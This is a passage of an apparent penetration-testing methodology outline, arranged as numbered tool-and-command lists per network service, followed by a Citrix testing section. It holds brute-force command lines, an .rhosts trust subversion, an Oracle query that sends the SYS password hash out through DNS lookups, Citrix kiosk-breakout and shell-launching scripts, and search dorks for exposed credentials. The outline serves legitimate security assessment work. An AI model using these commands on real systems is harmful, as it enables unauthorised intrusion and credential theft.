16.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
16.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
16.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
16.14.2. ldap brute force
16.14.2.1. bf_ldap
16.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
16.14.2.2. K0ldS
16.14.2.3. LDAP_Brute.pl
16.14.3. Examine Configuration Files
16.14.3.1. General
16.14.3.1.1. containers.ldif
16.14.3.1.2. ldap.cfg
16.14.3.1.3. ldap.conf
16.14.3.1.4. ldap.xml
16.14.3.1.5. ldap-config.xml
16.14.3.1.6. ldap-realm.xml
16.14.3.1.7. slapd.conf
16.14.3.2. IBM SecureWay V3 server
16.14.3.2.1. V3.sas.oc
16.14.3.3. Microsoft Active Directory server
16.14.3.3.1. msadClassesAttrs.ldif
16.14.3.4. Netscape Directory Server 4
16.14.3.4.1. nsslapd.sas_at.conf
16.14.3.4.2. nsslapd.sas_oc.conf
16.14.3.5. OpenLDAP directory server
16.14.3.5.1. slapd.sas_at.conf
16.14.3.5.2. slapd.sas_oc.conf
16.14.3.6. Sun ONE Directory Server 5.1
16.14.3.6.1. 75sas.ldif
16.15. PPTP/L2TP/VPN port 500/1723 open
16.15.1. Enumeration
16.15.1.1. ike-scan
16.15.1.2. ike-probe
16.15.2. Brute-Force
16.15.2.1. ike-crack
16.15.3. Reference Material
16.15.3.1. PSK cracking paper
16.15.3.2. SecurityFocus Infocus
16.15.3.3. Scanning a VPN Implementation
16.16. Modbus port 502 open
16.16.1. modscan
16.17. rlogin port 513 open
16.17.1. Rlogin Enumeration
16.17.1.1. Find the files
16.17.1.1.1. find / -name .rhosts
16.17.1.1.2. locate .rhosts
16.17.1.2. Examine Files
16.17.1.2.1. cat .rhosts
16.17.1.3. Manual Login
16.17.1.3.1. rlogin hostname -l username
16.17.1.3.2. rlogin <IP>
16.17.1.4. Subvert the files
16.17.1.4.1. echo ++ > .rhosts
16.17.2. Rlogin Brute force
16.17.2.1. Hydra
16.18. rsh port 514 open
16.18.1. Rsh Enumeration
16.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
16.18.2. Rsh Brute Force
16.18.2.1. rsh-grind
16.18.2.2. Hydra
16.18.2.3. medusa
16.19. SQL Server Port 1433 1434 open
16.19.1. SQL Enumeration
16.19.1.1. piggy
16.19.1.2. SQLPing
16.19.1.2.1. sqlping ip_address/hostname
16.19.1.3. SQLPing2
16.19.1.4. SQLPing3
16.19.1.5. SQLpoke
16.19.1.6. SQL Recon
16.19.1.7. SQLver
16.19.2. SQL Brute Force
16.19.2.1. SQLPAT
16.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
16.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
16.19.2.2. SQL Dict
16.19.2.3. SQLAT
16.19.2.4. Hydra
16.19.2.5. SQLlhf
16.19.2.6. ForceSQL
16.20. Citrix port 1494 open
16.20.1. Citrix Enumeration
16.20.1.1. Default Domain
16.20.1.2. Published Applications
16.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
16.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
16.20.2. Citrix Brute Force
16.20.2.1. bforce.js
16.20.2.2. connect.js
16.20.2.3. Citrix Brute-forcer
16.20.2.4. Reference Material
16.20.2.4.1. Hacking Citrix - the legitimate backdoor
16.20.2.4.2. Hacking Citrix - the forceful way
16.21. Oracle Port 1521 Open
16.21.1. Oracle Enumeration
16.21.1.1. oracsec
16.21.1.2. Repscan
16.21.1.3. Sidguess
16.21.1.4. Scuba
16.21.1.5. DNS/HTTP Enumeration
16.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
16.21.1.5.2. Untitled
16.21.1.6. WinSID
16.21.1.7. Oracle default password list
16.21.1.8. TNSVer
16.21.1.8.1. tnsver host [port]
16.21.1.9. TCP Scan
16.21.1.10. Oracle TNSLSNR
16.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
16.21.1.11. TNSCmd
16.21.1.11.1. perl tnscmd.pl -h ip_address
16.21.1.11.2. perl tnscmd.pl version -h ip_address
16.21.1.11.3. perl tnscmd.pl status -h ip_address
16.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
16.21.1.12. LSNrCheck
16.21.1.13. Oracle Security Check (needs credentials)
16.21.1.14. OAT
16.21.1.14.1. sh opwg.sh -s ip_address
16.21.1.14.2. opwg.bat -s ip_address
16.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
16.21.1.15. OScanner
16.21.1.15.1. sh oscanner.sh -s ip_address
16.21.1.15.2. oscanner.exe -s ip_address
16.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
16.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
16.21.1.16. NGS Squirrel for Oracle
16.21.1.17. Service Register
16.21.1.17.1. Service-register.exe ip_address
16.21.1.18. PLSQL Scanner 2008
16.21.2. Oracle Brute Force
16.21.2.1. OAK
16.21.2.1.1. ora-getsid hostname port sid_dictionary_list
16.21.2.1.2. ora-auth-alter-session host port sid username password sql
16.21.2.1.3. ora-brutesid host port start
16.21.2.1.4. ora-pwdbrute host port sid username password-file
16.21.2.1.5. ora-userenum host port sid userlistfile
16.21.2.1.6. ora-ver -e (-f -l -a) host port
16.21.2.2. breakable (Targets Application Server Port)
16.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
16.21.2.3. SQLInjector (Targets Application Server Port)
16.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
16.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
16.21.2.4. Check Password
16.21.2.5. orabf
16.21.2.5.1. orabf [hash]:[username] [options]
16.21.2.6. thc-orakel
16.21.2.6.1. Cracker
16.21.2.6.2. Client
16.21.2.6.3. Crypto
16.21.2.7. DBVisualisor
16.21.2.7.1. Sql scripts from pentest.co.uk
16.21.2.7.2. Manual sql input of previously reported vulnerabilties
16.21.3. Oracle Reference Material
16.21.3.1. Understanding SQL Injection
16.21.3.2. SQL Injection walkthrough
16.21.3.3. SQL Injection by example
16.21.3.4. Advanced SQL Injection in Oracle databases
16.21.3.5. Blind SQL Injection
16.21.3.6. SQL Cheatsheets
16.21.3.6.1. Untitled
16.22. NFS Port 2049 open
16.22.1. NFS Enumeration
16.22.1.1. showmount -e hostname/ip_address
16.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
16.22.2. NFS Brute Force
16.22.2.1. Interact with NFS share and try to add/delete
16.22.2.2. Exploit and Confuse Unix
16.22.3. Examine Configuration Files
16.22.3.1. /etc/exports
16.22.3.2. /etc/lib/nfs/xtab
16.22.4. nmap nse script
16.22.4.1. nfs-showmount
16.23. Compaq/HP Insight Manager Port 2301,2381open
16.23.1. HP Enumeration
16.23.1.1. Authentication Method
16.23.1.1.1. Host OS Authentication
16.23.1.1.2. Default Authentication
16.23.1.2. Wikto
16.23.1.3. Nstealth
16.23.2. HP Bruteforce
16.23.2.1. Hydra
16.23.2.2. Acunetix
16.23.3. Examine Configuration Files
16.23.3.1. path.properties
16.23.3.2. mx.log
16.23.3.3. CLIClientConfig.cfg
16.23.3.4. database.props
16.23.3.5. pg_hba.conf
16.23.3.6. jboss-service.xml
16.23.3.7. .namazurc
16.24. MySQL port 3306 open
16.24.1. Enumeration
16.24.1.1. nmap -A -n -p3306 <IP Address>
16.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
16.24.1.3. telnet IP_Address 3306
16.24.1.4. use test; select * from test;
16.24.1.5. To check for other DB's -- show databases
16.24.2. Administration
16.24.2.1. MySQL Network Scanner
16.24.2.2. MySQL GUI Tools
16.24.2.3. mysqlshow
16.24.2.4. mysqlbinlog
16.24.3. Manual Checks
16.24.3.1. Default usernames and passwords
16.24.3.1.1. username: root password:
16.24.3.1.2. testing
16.24.3.2. Configuration Files
16.24.3.2.1. Operating System
16.24.3.2.2. Command History
16.24.3.2.3. Log Files
16.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
16.24.3.2.5. MySQL data directory (Location specified in my.cnf)
16.24.3.2.6. SSL Check
16.24.3.3. Privilege Escalation
16.24.3.3.1. Current Level of access
16.24.3.3.2. Access passwords
16.24.3.3.3. Create a new user and grant him privileges
16.24.3.3.4. Break into a shell
16.24.4. SQL injection
16.24.4.1. mysql-miner.pl
16.24.4.1.1. mysql-miner.pl http://target/ expected_string database
16.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
16.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
16.24.5. References.
16.24.5.1. Design Weaknesses
16.24.5.1.1. MySQL running as root
16.24.5.1.2. Exposed publicly on Internet
16.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
16.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
16.25. RDesktop port 3389 open
16.25.1. Rdesktop Enumeration
16.25.1.1. Remote Desktop Connection
16.25.2. Rdestop Bruteforce
16.25.2.1. TSGrinder
16.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
16.25.2.2. Tscrack
16.26. Sybase Port 5000+ open
16.26.1. Sybase Enumeration
16.26.1.1. sybase-version ip_address from NGS
16.26.2. Sybase Vulnerability Assessment
16.26.2.1. Use DBVisualiser
16.26.2.1.1. Sybase Security checksheet
16.26.2.1.2. Manual sql input of previously reported vulnerabilties
16.26.2.2. NGS Squirrel for Sybase
16.27. SIP Port 5060 open
16.27.1. SIP Enumeration
16.27.1.1. netcat
16.27.1.1.1. nc IP_Address Port
16.27.1.2. sipflanker
16.27.1.2.1. python sipflanker.py 192.168.1-254
16.27.1.3. Sipscan
16.27.1.4. smap
16.27.1.4.1. smap IP_Address/Subnet_Mask
16.27.1.4.2. smap -o IP_Address/Subnet_Mask
16.27.1.4.3. smap -l IP_Address
16.27.2. SIP Packet Crafting etc.
16.27.2.1. sipsak
16.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
16.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
16.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
16.27.2.2. siprogue
16.27.3. SIP Vulnerability Scanning/ Brute Force
16.27.3.1. tftp bruteforcer
16.27.3.1.1. Default dictionary file
16.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
16.27.3.2. VoIPaudit
16.27.3.3. SiVuS
16.27.4. Examine Configuration Files
16.27.4.1. SIPDefault.cnf
16.27.4.2. asterisk.conf
16.27.4.3. sip.conf
16.27.4.4. phone.conf
16.27.4.5. sip_notify.conf
16.27.4.6. <Ethernet address>.cfg
16.27.4.7. 000000000000.cfg
16.27.4.8. phone1.cfg
16.27.4.9. sip.cfg etc. etc.
16.28. VNC port 5900^ open
16.28.1. VNC Enumeration
16.28.1.1. Scans
16.28.1.1.1. 5900^ for direct access.5800 for HTTP access.
16.28.2. VNC Brute Force
16.28.2.1. Password Attacks
16.28.2.1.1. Remote
16.28.2.1.2. Local
16.28.3. Exmine Configuration Files
16.28.3.1. .vnc
16.28.3.2. /etc/vnc/config
16.28.3.3. $HOME/.vnc/config
16.28.3.4. /etc/sysconfig/vncservers
16.28.3.5. /etc/vnc.conf
16.29. X11 port 6000^ open
16.29.1. X11 Enumeration
16.29.1.1. List open windows
16.29.1.2. Authentication Method
16.29.1.2.1. Xauth
16.29.1.2.2. Xhost
16.29.2. X11 Exploitation
16.29.2.1. xwd
16.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
16.29.2.2. Keystrokes
16.29.2.2.1. Received
16.29.2.2.2. Transmitted
16.29.2.3. Screenshots
16.29.2.4. xhost +
16.29.3. Examine Configuration Files
16.29.3.1. /etc/Xn.hosts
16.29.3.2. /usr/lib/X11/xdm
16.29.3.2.1. Untitled
16.29.3.3. /usr/lib/X11/xdm/xsession
16.29.3.4. /usr/lib/X11/xdm/xsession-remote
16.29.3.5. /usr/lib/X11/xdm/xsession.0
16.29.3.6. /usr/lib/X11/xdm/xdm-config
16.29.3.6.1. DisplayManager*authorize:on
16.30. Tor Port 9001, 9030 open
16.30.1. Tor Node Checker
16.30.1.1. Ip Pages
16.30.1.2. Kewlio.net
16.30.2. nmap NSE script
16.31. Jet Direct 9100 open
16.31.1. hijetta
17. Final Report - template
18. Nouveau sujet
19. Nouveau sujet
20. Citrix Specific Testing
20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
20.2. Enumeration
20.2.1. web search
20.2.1.1. Google (GHDB)
20.2.1.1.1. ext:ica
20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
20.2.1.1.3. [WFClient] Password= filetype:ica
20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
20.2.1.1.6. inurl:/Citrix/Nfuse17/
20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
20.2.1.2. Google Hacks (Author Discovered)
20.2.1.2.1. filetype:ica Username=
20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx
20.2.1.2.3. inurl:/Citrix/AccessPlatform/
20.2.1.2.4. inurl:LogonAgent/Login.asp
20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp
20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp
20.2.1.2.7. inurl:/Citrix/NFuse16
20.2.1.2.8. inurl:/Citrix/NFuse151/
20.2.1.2.9. allintitle:MetaFrame XP Login
20.2.1.2.10. allintitle:MetaFrame Presentation Server Login
20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login
20.2.1.3. Yahoo
20.2.1.3.1. originurlextension:ica
20.2.2. site search
20.2.2.1. Manual
20.2.2.1.1. review web page for useful information
20.2.2.1.2. review source for web page
20.2.3. generic
20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
20.2.3.2. amap -bqv ip_address port_no.
20.2.4. citrix specific
20.2.4.1. enum.pl
20.2.4.1.1. perl enum.pl ip_address
20.2.4.2. enum.js
20.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
20.2.4.3. connect.js
20.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
20.2.4.4. Citrix-pa-scan
20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
20.2.4.5. pabrute.c
20.2.4.5.1. ./pabrute pubapp list app_list ip_address
20.2.5. Default Ports
20.2.5.1. TCP
20.2.5.1.1. Citrix XML Service
20.2.5.1.2. Advanced Management Console
20.2.5.1.3. Citrix SSL Relay
20.2.5.1.4. ICA sessions
20.2.5.1.5. Server to server
20.2.5.1.6. Management Console to server
20.2.5.1.7. Session Reliability (Auto-reconnect)
20.2.5.1.8. License Management Console
20.2.5.1.9. License server
20.2.5.2. UDP
20.2.5.2.1. Clients to ICA browser service
20.2.5.2.2. Server-to-server
20.2.6. nmap nse scripts
20.2.6.1. citrix-enum-apps
20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
20.2.6.2. citrix-enum-apps-xml
20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
20.2.6.3. citrix-enum-servers
20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
20.2.6.4. citrix-enum-servers-xml
20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
20.2.6.5. citrix-brute-xml
20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
20.3. Scanning
20.3.1. Nessus
20.3.1.1. Plugins
20.3.1.1.1. CGI abuses
20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
20.3.1.1.3. Misc.
20.3.1.1.4. Service Detection
20.3.1.1.5. Web Servers
20.3.1.1.6. Windows
20.3.2. Nikto
20.3.2.1. perl nikto.pl -host ip_address -port port_no.
20.3.2.1.1. Untitled
20.4. Exploitation
20.4.1. Alter default .ica files
20.4.1.1. InitialProgram=cmd.exe
20.4.1.2. InitialProgram=c:\windows\system32\cmd.exe
20.4.1.3. InitialProgram=explorer.exe
20.4.2. Enumerate and Connect
20.4.2.1. For applications identified by Citrix-pa-scan
20.4.2.1.1. Pas
20.4.2.2. For published applications with a Citrix client when the master browser is non-public.
20.4.2.2.1. Citrix-pa-proxy
20.4.3. Manual Testing
20.4.3.1. Create Batch File (cmd.bat)
20.4.3.1.1. 1
20.4.3.1.2. 2
20.4.3.2. Host Scripting File (cmd.vbs)
20.4.3.2.1. Option Explicit
20.4.3.2.2. Dim objShell
20.4.3.2.3. Set objShell = CreateObject("WScript.Shell")
20.4.3.2.4. objShell.Run "%comspec% /k"
20.4.3.2.5. WScript.Quit
20.4.3.2.6. alternative functionality
20.4.3.3. iKat
20.4.3.3.1. Integrated Kiosk Attack Tool
20.4.3.4. AT Command - priviledge escalation
20.4.3.4.1. AT HH:MM /interactive "cmd.exe"
20.4.3.4.2. AT HH:MM /interactive %comspec% /k
20.4.3.4.3. Untitled
20.4.3.5. Keyboard Shortcuts/ Hotkeys
20.4.3.5.1. Ctrl + h – View History
20.4.3.5.2. Ctrl + n – New Browser
20.4.3.5.3. Shift + Left Click – New Browser
20.4.3.5.4. Ctrl + o – Internet Address (browse feature)
20.4.3.5.5. Ctrl + p – Print (to file)
20.4.3.5.6. Right Click (Shift + F10)
20.4.3.5.7. F1 – Jump to URL
20.4.3.5.8. SHIFT+F1: Local Task List
20.4.3.5.9. SHIFT+F2: Toggle Title Bar
20.4.3.5.10. SHIFT+F3: Close Remote Application
20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
20.4.3.5.12. CTRL+F2: Remote Task List
20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
20.4.3.5.14. ALT+F2: Cycle through programs
20.4.3.5.15. ALT+PLUS: Alt+TAB
20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
20.5. Brute Force
20.5.1. bforce.js
20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
20.5.1.3. Untitled
20.6. Review Configuration Files
20.6.1. Application server configuration file
20.6.1.1. appsrv.ini
20.6.1.1.1. Location
20.6.1.1.2. World writeable
20.6.1.1.3. Review other files
20.6.1.1.4. Sample file
20.6.2. Program Neighborhood configuration file
20.6.2.1. pn.ini
20.6.2.1.1. Location
20.6.2.1.2. Review other files
20.6.2.1.3. Sample file
20.6.3. Citrix ICA client configuration file
20.6.3.1. wfclient.ini
20.6.3.1.1. Location
20.6.3.1.2. Sample file
20.7. References
20.7.1. Vulnerabilities
20.7.1.1. Art of Hacking
20.7.1.2. Common Vulnerabilities and Exploits (CVE)
20.7.1.2.1. Untitled
20.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
20.7.1.3. OSVDB
20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
20.7.1.4. Secunia
20.7.1.4.1. http://secunia.com/advisories/search/?search=citrix
20.7.1.5. Security-database.com
20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
20.7.1.6. SecurityFocus
20.7.2. Support
20.7.2.1. Citrix
20.7.2.1.1. Knowledge Base
20.7.2.1.2. Forum
20.7.2.2. Thinworld
20.7.3. Exploits
20.7.3.1. Milw0rm
20.7.3.1.1. http://www.milw0rm.com/search.php
20.7.3.2. Art of Hacking
20.7.3.2.1. Citrix
20.7.4. Tutorials/ Presentations
20.7.4.1. Carnal0wnage
20.7.4.1.1. Carnal0wnage Blog: Citrix Hacking
20.7.4.2. Foundstone
20.7.4.2.1. Got Citrix, Hack IT
20.7.4.3. GNUCitizen
20.7.4.3.1. Hacking CITRIX - the forceful way
20.7.4.3.2. 0day: Hacking secured CITRIX from outside
20.7.4.3.3. CITRIX: Owning the Legitimate Backdoor
20.7.4.3.4. Remote Desktop Command Fixation Attacks
20.7.4.4. Packetstormsecurity
20.7.4.4.1. Hacking Citrix
20.7.4.5. Insomniac Security
20.7.4.5.1. Hacking Citrix
20.7.4.6. Aditya Sood
20.7.4.6.1. Rolling Balls - Can you hack clients
20.7.4.7. BlackHat
20.7.4.7.1. Client Side Security
20.7.5. Tools Resource
20.7.5.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access